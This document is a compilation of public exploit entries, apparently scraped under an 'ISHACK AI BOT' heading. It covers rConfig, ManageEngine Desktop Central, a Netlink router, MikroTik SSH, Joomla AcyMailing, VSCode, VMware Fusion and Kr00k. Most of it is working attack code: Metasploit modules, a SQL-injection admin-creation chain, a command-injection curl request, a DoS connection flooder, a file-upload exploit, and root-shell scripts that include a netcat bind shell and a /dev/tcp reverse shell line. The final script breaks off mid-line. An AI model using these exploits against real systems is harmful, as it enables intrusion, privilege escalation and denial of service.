ISHACK AI BOT

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Rconfig 3.x Chained Remote Code Execution', 'Description' => ' This module exploits multiple vulnerabilities in rConfig version 3.9 in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `path` parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQLI. This module has been successfully tested on Rconfig 3.9.3 and 3.9.4. The steps are: 1. SQLi on /commands.inc.php allows us to add an administrative user. 2. An authenticated session is established with the newly added user 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to execute the payload. 4. Remove the added admin user. Tips : once you get a shell, look at the CVE-2019-19585. You will probably get root because rConfig install script add Apache user to sudoers with nopasswd ;-) ', 'License' => MSF_LICENSE, 'Author' => [ 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/) ], 'References' => [ ['CVE', '2019-19509'], # authenticated rce ['CVE', '2020-10220'], # sqli auth bypass %w[EDB 47982], %w[EDB 48208], ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi ], 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD, 'Targets' => [['Auto', {}]], 'Privileged' => false, 'DisclosureDate' => '2020-03-11', 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects 'PAYLOAD' => 'generic/shell_reverse_tcp' }, 'DefaultTarget' => 0)) register_options [ OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/']) ] end # CHECK IF RCONFIG IS REACHABLE AND INSTALLED def check vprint_status 'STEP 0: Get rConfig version...' res = send_request_cgi!( 'method' => 'GET', 'uri' => '/login.php' ) if !res || !res.get_html_document fail_with(Failure::Unknown, 'Could not check rConfig version') end if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9' print_good('rConfig version 3.9 detected') return Exploit::CheckCode::Appears elsif res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig' print_status('rConfig detected, but not version 3.9') return Exploit::CheckCode::Detected end end # CREATE AN ADMIN USER IN RCONFIG def create_rconfig_user(user, _password) vprint_status 'STEP 1 : Adding a temporary admin user...' fake_id = Rex::Text.rand_text_numeric(3) fake_pass = Rex::Text.rand_text_alpha(10) fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin' fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d' userleveladmin = 9 # Administrator user_sqli = "command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--" sqli_res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'), 'method' => 'GET', 'vars_get' => { 'search' => 'search', 'searchOption' => 'contains', 'searchField' => 'vuln', 'searchColumn' => user_sqli } ) unless sqli_res print_warning('Failed to create user: Connection failed.') return end print_good "New temporary user #{user} created" end # AUTHENTICATE ON RCONFIG def login(user, pass) vprint_status "STEP 2: Authenticating as #{user} ..." # get session cookie (PHPSESSID) res = send_request_cgi!( 'method' => 'GET', 'uri' => '/login.php' ) @cookie = res.get_cookies if @cookie.empty? fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies' return end # authenticate res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'), 'cookie' => @cookie, 'vars_post' => { pass: pass, user: user, sublogin: 1 } ) unless res print_warning('Failed to authenticate: Connection failed.') return end print_good "Authenticated as user #{user}" end def trigger_rce(cmd, _opts = {}) vprint_status "STEP 3: Executing the command (#{cmd})" trigger = "`#{cmd} #`" res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'), 'cookie' => @cookie, 'vars_get' => { 'path' => trigger, 'ext' => 'random' } ) # the page hangs because of the command being executed, so we can't expect HTTP response # unless res # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed' # return # end # unless res.body.include? '"success":true' # fail_with Failure::Unknown, 'It seems that the code was not executed' # return # end print_good 'Command sucessfully executed' end # DELETE A USER def delete_rconfig_user(user) vprint_status 'STEP 4 : Removing the temporary admin user...' del_sqli = "command ; DELETE FROM `users` WHERE `username`='#{user}';--" del_res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'), 'method' => 'GET', 'vars_get' => { 'search' => 'search', 'searchOption' => 'contains', 'searchField' => 'vuln', 'searchColumn' => del_sqli } ) unless del_res print_warning "Removing user #{user} failed: Connection failed. Please remove it manually." return end print_status "User #{user} removed successfully !" end def cleanup super delete_rconfig_user @username if @username end def exploit check @username = rand_text_alphanumeric(8..12) @password = 'admin' create_res = create_rconfig_user @username, @password login(@username, @password) tmp_txt_file = Rex::Text.rand_text_alpha(10) tmp_zip_file = Rex::Text.rand_text_alpha(10) # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-( # trigger_rce("touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'") trigger_rce(payload.encoded.to_s) end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::AutoCheck include Msf::Exploit::CmdStager include Msf::Exploit::Powershell include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ManageEngine Desktop Central Java Deserialization', 'Description' => %q{ This module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions < 10.0.474. Tested against 10.0.465 x64. "The short-term fix for the arbitrary file upload vulnerability was released in build 10.0.474 on January 20, 2020. In continuation of that, the complete fix for the remote code execution vulnerability is now available in build 10.0.479." }, 'Author' => [ 'mr_me', # Discovery and exploit 'wvu' # Module ], 'References' => [ ['CVE', '2020-10189'], ['URL', 'https://srcincite.io/advisories/src-2020-0011/'], ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] ], 'DisclosureDate' => '2020-03-05', # 0day release 'License' => MSF_LICENSE, 'Platform' => 'windows', 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ ['Windows Command', 'Arch' => ARCH_CMD, 'Type' => :win_cmd ], ['Windows Dropper', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper ], ['PowerShell Stager', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh_stager ] ], 'DefaultTarget' => 2, 'DefaultOptions' => { 'RPORT' => 8383, 'SSL' => true, 'WfsDelay' => 60 # It can take a little while to trigger }, 'CmdStagerFlavor' => 'certutil', # This works without issue 'Notes' => { 'PatchedVersion' => Gem::Version.new('100474'), 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'configurations.do') ) unless res return CheckCode::Unknown('Target is not responding to check') end unless res.code == 200 && res.body.include?('ManageEngine Desktop Central') return CheckCode::Unknown('Target is not running Desktop Central') end version = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text unless version return CheckCode::Detected('Could not detect Desktop Central version') end vprint_status("Detected Desktop Central version #{version}") if Gem::Version.new(version) < notes['PatchedVersion'] return CheckCode::Appears("#{version} is an exploitable version") end CheckCode::Safe("#{version} is not an exploitable version") end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :win_cmd execute_command(payload.encoded) when :win_dropper execute_cmdstager when :psh_stager execute_command(cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true )) end end def execute_command(cmd, _opts = {}) # XXX: An executable is required to run arbitrary commands cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper vprint_status("Serializing command: #{cmd}") # I identified mr_me's binary blob as the CommonsBeanutils1 payload :) serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( 'CommonsBeanutils1', cmd ) # XXX: Patch in expected serialVersionUID serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e" # Rock 'n' roll! upload_serialized_payload(serialized_payload) deserialize_payload end def upload_serialized_payload(serialized_payload) print_status('Uploading serialized payload') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'), 'ctype' => 'application/octet-stream', 'vars_get' => { 'udid' => 'si\\..\\..\\..\\webapps\\DesktopCentral\\_chart', 'filename' => 'logger.zip' }, 'data' => serialized_payload ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') end print_good('Successfully uploaded serialized payload') # C:\Program Files\DesktopCentral_Server\bin register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip') end def deserialize_payload print_status('Deserializing payload') res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'cewolf/'), 'vars_get' => {'img' => '\\logger.zip'} ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Could not deserialize payload') end print_good('Successfully deserialized payload') end end

# Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution # Date: 2020-03-17 # Exploit Author: shellord # Vendor Homepage: https://www.netlink-india.com/ # Version: 1.0.11 # Tested on: Windows 10 # CVE: N/A Exploit : curl -L -d "target_addr=;ls /&waninf=1_INTERNET_R_VID_154" http://TARGETIP/boaform/admin/formPing Response : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!--ϵͳĬģ--> <html> <head> <title>PINGԽ</title> <meta http-equiv=pragma content=no-cache> <meta http-equiv=refresh content="2"> <meta http-equiv=cache-control content="no-cache, must-revalidate"> <meta http-equiv=content-type content="text/html; charset=gbk"> <meta http-equiv=content-script-type content=text/javascript> <!--ϵͳcss--> <style type=text/css> @import url(/style/default.css); </style> <!--ϵͳű--> <script language="javascript" src="common.js"></script> </head> <!--------------------------------------------------------------------------------------> <!--ҳ--> <body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000"> <blockquote> <form> <div align="left" style="padding-left:20px;"><br> <div align="left"><b>Finish</b> <br><br> </div> <pre> bin dev etc home image lib mnt proc sbin sys tmp usr var </pre> <input type=button value="back" onClick=window.location.replace("/diag_ping_admin_en.asp")> </div> </form> </blockquote> </body> </html>

# Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path # Discovery by: Alan Mondragon "El Masas" # Discovery Date: 2020-03-17 # Vendor Homepage: https://www.veritas.com/ # Software Link : https://www.veritas.com/ # Veritas # Tested Version: 7.0 # Vulnerability Type: Unquoted t Service Path # Tested on OS: Windows Server 2008 R2 en # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Auto NetBackup Client Service NetBackup INET Daemon C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe Auto C:\>sc qc "NetBackup INET Daemon" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NetBackup INET Daemon TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NetBackup Client Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) # Author: Hosein Askari # Date: 2020-03-18 # Vendor Homepage: https://mikrotik.com/ # Model: hAP lite # Processor architecture: smips # Affected Version: through 6.44.3 # CVE: N/A #Description: An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management. #details: The issue reported in 02/25/2020 to the Mikrotik First response by Mikrotik in 02/26/2020 The additional information about exploit and PoC video sent in 02/26/2020 The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date #PoC: #Mitigation: It can be mitigated with firewall filter and service port restrictions. Solution: Hardening and tuning the daemon for these 2 parameters: 1- Number of allowed unauthenticated connections to ssh daemon 2- Maximum number of connections at which we start dropping everything for ssh daemon PoC: #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <signal.h> #include <netinet/in.h> #include <arpa/inet.h> #define MAX_CON 32 #define MAX_THREADS 16 int Socket(char *ip, char *port) { struct addrinfo hints, *ret, *p; int sock, r; ssize_t bytes; char buffer[2048]; memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if((r=getaddrinfo(ip, port, &hints, &ret))!=0) { return EXIT_FAILURE; } for(p = ret; p != NULL; p = p->ai_next) { if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { continue; } if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { close(sock); continue; } break; } if(ret) freeaddrinfo(ret); fprintf(stderr, "ESTABLISHED %s:%s\n", ip, port); return sock; } void signal_callback_handler(int signum){ printf("Caught signal SIGPIPE %d\n",signum); } void mal(char *ip, char *port, int id) { int sockets[MAX_CON]; int i, g=1, r; for(i=0; i!= MAX_CON; i++) sockets[i]=0; signal(SIGPIPE, signal_callback_handler); while(1) { for(i=0; i!= MAX_CON; i++) { if(sockets[i] == 0) sockets[i] = Socket(ip, port); r=write(sockets[i], "\0", 1); if(r == -1) { close(sockets[i]); sockets[i] = Socket(ip, port); } } usleep(200000); } } int main(int argc, char **argv) { int i; for(i=0; i!= MAX_THREADS; i++) { if(fork()) mal(argv[1], argv[2], i); usleep(200000); } getc(stdin); return 0; } ######### Sincerely, Hosein Askari

# Exploit Title: Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload # Google Dork: inurl:"index.php?option=com_acym" # Date: 2020-03-16 # Exploit Author: qw3rTyTy # Vendor Homepage: https://www.acyba.com/ # Software Link: https://www.acyba.com/acymailing/download.html # Version: v6.9.1 Starter # Tested on: Joomla! v3.9.0 # CVE: N/A ######################################################################################## #Analysis of vulnerability ######################################################################################## Vulnerable code is in MailsController::setNewIconShare() in file "back/controllers/mails.php". [BEGIN_CODE] 600 public function setNewIconShare() 601 { 602 $socialName = acym_getVar('string', 'social', ''); 603 $extension = pathinfo($_FILES['file']['name']); 604 $newPath = ACYM_UPLOAD_FOLDER.'socials'.DS.$socialName; 605 $newPathComplete = $newPath.'.'.$extension['extension']; 606 //There code is no checking CSRF token, no sanitizing, and authentication. 607 if (!acym_uploadFile($_FILES['file']['tmp_name'], ACYM_ROOT.$newPathComplete) || empty($socialName)) { //!!! 608 echo 'error'; 609 exit; 610 } 611 612 $newConfig = new stdClass(); 613 $newConfig->social_icons = json_decode($this->config->get('social_icons', '{}'), true); 614 615 $newImg = acym_rootURI().$newPathComplete; 616 $newImgWithoutExtension = acym_rootURI().$newPath; 617 618 $newConfig->social_icons[$socialName] = $newImg; 619 $newConfig->social_icons = json_encode($newConfig->social_icons); 620 $this->config->save($newConfig); 621 622 echo json_encode( 623 [ 624 'url' => $newImgWithoutExtension, 625 'extension' => $extension['extension'], 626 ] 627 ); 628 exit; 629 } function acym_uploadFile($src, $dest) { $dest = acym_cleanPath($dest); $baseDir = dirname($dest); if (!file_exists($baseDir)) { acym_createFolder($baseDir); } if (is_writeable($baseDir) && move_uploaded_file($src, $dest)) {//!!! if (@chmod($dest, octdec('0644'))) { return true; } else { acym_enqueueMessage(acym_translation('ACYM_FILE_REJECTED_SAFETY_REASON'), 'error'); } } else { acym_enqueueMessage(acym_translation_sprintf('ACYM_COULD_NOT_UPLOAD_FILE_PERMISSION', $baseDir), 'error'); } return false; } [END_CODE] ######################################################################################## #Exploit ######################################################################################## #!/usr/bin/perl # #$> perl ./exploit.pl "http://127.0.0.1/joomla" "lolz" /tmp/lolz.php use strict; use warnings; use LWP::UserAgent; use JSON(qw/decode_json/); ######################################################################################## sub print_usage_and_exit { print("*** com_acym Arbitrary File Upload exploit\n"); print("Usage: $0 <URL> <path_to_upload> <file_to_upload>\n"); print("\n"); exit(); } sub fetch_useragent { my @available_useragents = ( "gertrud barkhorn", "erica hartmann", "eila ilmatar juutilainen", ); return($available_useragents[(rand(scalar(@available_useragents)))]); } sub is_valid_url { my $given_url = shift(@_); return 1 if ( $given_url =~ /^http(s)?:\/\// ); return 0; } sub do_die { my $errmsg = shift(@_); printf("[!] %s\n", $errmsg); exit(); } sub get_base_path { return(sprintf("%s/index.php", $_[0])); } sub do_exploit { my %params = %{ shift(@_); }; my $ua = LWP::UserAgent->new( "agent" => $params{"useragent"}, "timeout" => 360 ); print("[+] Trying to exploit ...\n"); print("[*] Sending POST request ...\n"); my $response = $ua->post( get_base_path($params{"url"}), "Content-Type" => "form-data", "Accept-Language" => "zh-cn", "Content" => { "option" => "com_acym", "ctrl" => "frontmails", "task" => "setNewIconShare", "social" => $params{"path"}, "file" => [ $params{"file"} ], }, ); if ( $response->code == 200 ) { my $j = decode_json($response->decoded_content); my $f = sprintf("%s.%s", $j->{"url"}, $j->{"extension"}); my $response = $ua->head($f); printf("[\$] Uploaded file in %s\n", $f) if ( $response->code == 200 ); } } sub main { print_usage_and_exit() if ( scalar(@ARGV) < 2 ); my %params = ( "url" => $ARGV[0], "path" => $ARGV[1], "file" => $ARGV[2], "useragent" => fetch_useragent()); do_die("Given invalid URL.") if ( !is_valid_url($ARGV[0]) ); do_die("Given invalid File.") if ( (!-e $ARGV[2]) or (stat($ARGV[2]))[7] == 0); printf("[*] Parameters:\n"); while ( my ($k, $v) = each(%params) ) { printf("[+] %s => %s\n", $k, $v); } printf("*" x50 . "\n"); while ( 1 ) { printf("[?] Proceed(y/n)> "); my $c = <STDIN>; chomp($c); if ( (length($c) == 1) and lc($c) eq "y" ) { do_exploit(\%params); last; } } } main(); ########################################################################################

# VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension. >TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository. You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html). ## HowTo - Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git` - Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC is executing *Calculator.app* - Open `test.py` in VScode Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48231.zip

Local Privilege Escalation via VMWare Fusion Overview: A directory traversal vulnerability in VMware Fusion's SUID binaries can allow an attacker to run commands as the root user. Tested Versions: * VMware Fusion 10.1.3 (9472307) on macOS 10.13.6 * VMware Fusion 11.0.0 (10120384) on macOS 10.14.1 * VMware Fusion 11.0.2 (10952296) on macOS 10.14.1 * VMware Fusion 11.5.0 (14634996) on macOS 10.15.1 * VMware Fusion 11.5.1 (15018442) on macOS 10.15.1 Exercising: 1) Ensure the VMware Fusion services are not running. If open, quit the VMware Fusion GUI. 2) Run one of the exploit script (exploit_fusion.sh or exploit_usb.sh). They will remain running until manually stopped via CTRL-c. The exploit will start a netcat listener as root on TCP port 3333. 3) Connect to the netcat listener: nc 127.0.0.1 3333 Details: This vulnerability is a directory traversal bug inside of VMware Fusion. Several of the programs included in VMware Fusion rely on the their path on disk to find other libraries, helper utilities, and service daemons. Two such instances of this code pattern in SUID programs can be found in the "Open VMware Fusion Services" executable and the "Open VMware USB Arbitrator Service" executable. These programs try to open the service programs by looking for the files: Open VMware Fusion Services: $DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware Fusion Services Open VMware USB Arbitrator Service: $DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware USB Arbitrator Service While ordinarily this is fine, as any attempt to copy the programs will not copy the SUID ownership of the file and any attempt to the move the programs will fail without root access. Furthermore symbolic links will not trick the programs into using the new location. However, on macOS unprivileged users can create hard links to SUID executables, which will trick the programs. Thus, by creating an adequate directory layout and hard linking to the SUID programs, we can trick them into running an executable of our choice as the root user. The included exploit_usb.sh and exploit_fusion.sh scripts setup the correct directory structure and hard link, compile the payload, and run the linked program in order to start a netcat listener as root on TCP port 3333. In addition to the two SUID executables listed above, the SUID executable "vmware-authd" is also vulnerable to this bug. vmware-authd tries to load two libraries, libcrypto and libssl, from the incorrect directory. However, the two libraries must be signed by apple or with an apple distributed signing certificate from an organization containing the word "VMware". As such, this bug is harder to exploit in vmware-authd. Depending on how strict Apple's developer verification process is, it may be possible to fool Apple into granting a matching certificate by hiding VMware within a phrase, such as with a certificate for "Never Mind Where cloud services inc (NVMware Inc)". One limitation to this vulnerability is that these two vulnerable service openers will not try to open their services if the service is already running. Thus, the exploit will not work if the "VMware USB Arbitrator Service" and "VMware Fusion Services" services are already running. Thus, if the VMware Fusion GUI is open, this vulnerability cannot be exploited. However, closing the GUI will stop the services associated with the vulnerable service openers and make the vulnerability once again exploitable. In contrast, the library injection attack is not subject to these restrictions (but requires the appropriate certificate). As a side note, the vulnerable code is also used in VMware Workstation on Linux. However, Linux does not allow an unprivileged user to create hard links to files they do not own. As such, this bug is not exploitable in VMware Workstation on Linux. Timeline: 2019.11.12 Reported to VMware 2019.12.18 VMware confirms they can reproduce the issue 2019.12.24 Asked for status update, were told we'd get an update in early Jan 2020.01.08 Requested status update, were told fix scheduled for April 2020 2020.01.15 Called VMware to discuss 2020.01.21 Follow up meeting with VMware to discuss 2020.03.17 VMware releases patch & public disclosure ## exploit_fusion.sh ``` #!/bin/sh # Remake the necessary folder structure rm -rf a Contents mkdir -p Contents/Library/services/ mkdir -p a/b/c/ # Build our payload clang payload.c -o "Contents/Library/services/VMware Fusion Services" # Create a hard link to the VMware SUID opener program ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services a/b/c/linked # Run the linked program, which causes it to be confused about the path, and # launch our payload. Additionally if our payload exits, VMware will relaunch # it a/b/c/linked ``` ## exploit_fusion.sh EOF ## exploit_usb.sh ``` #!/bin/sh # Remake the necessary folder structure rm -rf a Contents mkdir -p Contents/Library/services/ mkdir -p a/b/c/ # Build our payload clang payload.c -o "Contents/Library/services/VMware USB Arbitrator Service" # Create a hard link to the VMware SUID opener program ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ USB\ Arbitrator\ Service a/b/c/linked # Run the linked program, which causes it to be confused about the path, and # launch our payload. Additionally if our payload exits, VMware will relaunch # it a/b/c/linked ``` ## exploit_usb.sh EOF ## payload.c ``` #include <stdlib.h> #include <unistd.h> int main(int argc, char**argv) { setuid(0); system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 3333 > /tmp/f"); return 0; } ``` ## payload.c EOF

# Kr00ker # # Experimetal KR00K PoC in python3 using scapy # # Description: # This script is a simple experiment to exploit the KR00K vulnerability (CVE-2019-15126), # that allows to decrypt some WPA2 CCMP data in vulnerable devices. # More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP packets knowning: # * the TK (128 bites all zero) # * the Nonce (sent plaintext in packet header) # * the Encrypted Data # # Where: # * WPA2 AES-CCMP decryption --> AES(Nonce,TK) XOR Encrypted Data = Decrypted Data # * Decrypted stream starts with "\xaa\xaa\x03\x00\x00\x00" # * Nonce (104 bits) = Priority (1byte) + SRC MAC (6bytes) + PN (6bytes) # # This PoC works on WPA2 AES CCMP with Frequency 2.4GHz WLANs. # # References: # https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf # # # Copyright (C) 2020 Maurizio Siddu # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/> import argparse, threading import datetime, sys, re from scapy.all import * from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth from Cryptodome.Cipher import AES # Proof of Sympathy ;-) LOGO = """\ __ _ ____ __ __ __ _ ____ ____ ( / )( _ \ / \ / \( / )( __)( _ \\ ) ( ) /( 0 )( 0 )) ( ) _) ) / (__\_)(__\_) \__/ \__/(__\_)(____)(__\_) """ KR00K_PATTERN = b'\xaa\xaa\x03\x00\x00\x00' class Krooker: # Define Krooker class def __init__(self, interface, target_mac, other_mac, reason, num, delay): self.interface = interface self.target_mac = target_mac self.other_mac = other_mac self.reason = reason self.num = num self.delay = delay def wpa2_decrypt(self, enc_pkt): # Try to decrypt the data contained in the sniffed packet t_key = bytes.fromhex("00000000000000000000000000000000") # This check is redundant if not enc_pkt.haslayer(Dot11CCMP): return None dot11 = enc_pkt[Dot11] dot11ccmp = enc_pkt[Dot11CCMP] # Extract the Packet Number (IV) PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(dot11ccmp.PN5,dot11ccmp.PN4,dot11ccmp.PN3,dot11ccmp.PN2,dot11ccmp.PN1,dot11ccmp.PN0) # Extract the victim MAC address source_addr = re.sub(':','',dot11.addr2) # Extract the QoS tid if enc_pkt.haslayer(Dot11QoS): tid = "{:01x}".format(enc_pkt[Dot11QoS].TID) else: tid = '0' priority = tid + '0' # Build the nonce ccmp_nonce = bytes.fromhex(priority) + bytes.fromhex(source_addr) + bytes.fromhex(PN) # Finally try to decrypt wpa2 data enc_cipher = AES.new(t_key, AES.MODE_CCM, ccmp_nonce, mac_len=8) decrypted_data = enc_cipher.decrypt(dot11ccmp.data[:-8]) return decrypted_data def disassociate(self): # Forge the dot11 disassociation packet dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason) # Loop to send the disassociation packets to the victim device while True: # Repeat every delay value seconds time.sleep(self.delay) print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac) sendp(dis_packet, iface=self.interface, count=self.num, verbose=False) def check_packet(self, sniffed_pkt): # Filter for WPA2 AES CCMP packets containing data to decrypt if sniffed_pkt[Dot11].type == 2 and sniffed_pkt.haslayer(Dot11CCMP): #print("["+str(datetime.now().time())+"][DEBUG] packet tipe:"+str(sniffed_pkt[Dot11].type)+" sub:"+str(sniffed_pkt[Dot11].subtype)) # Decrypt the packets using the all zero temporary key dec_data = self.wpa2_decrypt(sniffed_pkt) # Check if the target is vulnerable if dec_data and dec_data[0:len(KR00K_PATTERN)] == KR00K_PATTERN: print("["+str(datetime.now().time())+"][+] Target "+self.target_mac+" is vulnerable to Kr00k, decrypted "+str(len(dec_data))+" bytes") hexdump(dec_data) # Save the encrypted and decrypted packets print("["+str(datetime.now().time())+"][+] Saving encrypted and decrypted 'pcap' files in current folder") dec_pkt = bytes.fromhex(re.sub(':','',self.target_mac) + re.sub(':','',self.other_mac)) + dec_data[6:] wrpcap("enc_pkts.pcap", sniffed_pkt, append=True) wrpcap("dec_pkts.pcap", dec_pkt, append=True) # Uncomment this if you need a one-shoot PoC decryption #sys.exit(0) #else: #print("["+str(datetime.now().time())+"][DEBUG] This data decryption with all zero TK went wrong") #pass def run_disassociation(self): # Run disassociate function in a background thread try: self.disassociate() except KeyboardInterrupt: print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt") return def main(): # Passing arguments parser = argparse.ArgumentParser(prog="kr00ker.py", usage="%(prog)s -i <interface-name> -s <SSID> -c <MAC-client> -n <num-packets> -r <reason-id> -t <target-id> -w 